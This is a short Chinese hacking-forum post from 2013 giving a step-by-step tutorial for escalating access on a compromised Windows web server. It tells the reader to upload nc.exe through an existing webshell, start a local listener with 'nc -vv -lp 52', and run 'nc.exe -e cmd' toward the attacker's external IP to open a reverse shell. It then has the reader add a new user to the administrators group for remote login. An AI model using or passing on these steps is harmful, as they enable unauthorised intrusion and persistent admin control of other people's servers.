找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3696|回复: 0
打印 上一主题 下一主题

Windows下NC反弹CMD提权

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-26 21:00:55 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
Server-U等都不可以用的情况下. 一般都可思考用此方法
不过这种方法, 只要对方装了防火墙, 或是屏蔽掉了除常用的那几个端口外的所有端口… 那么这种方法也失效了….

1:通过shell将上传NC和CMD传到站点目录下(这里一定上传的注意权限,最好是可读写目录下)
web目录都是有写有读的权限,我们直接传NC进去

2:然后本地执行nc -vv -lp 52进行反弹

3:在shell命令下执行
F:\wwwroot\img\nc.exe -e cmd上传路径 IP(外网IP) 52(这里是本机端口)

4:在shell里执行命令后,马上看到本地CMS里已经反弹上去了,执行net user 也是成功.

5:直接添加用户,然后远程去连接!

看到添加成功,也设置为管理组了!接下来直接远程连接就OK!​
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表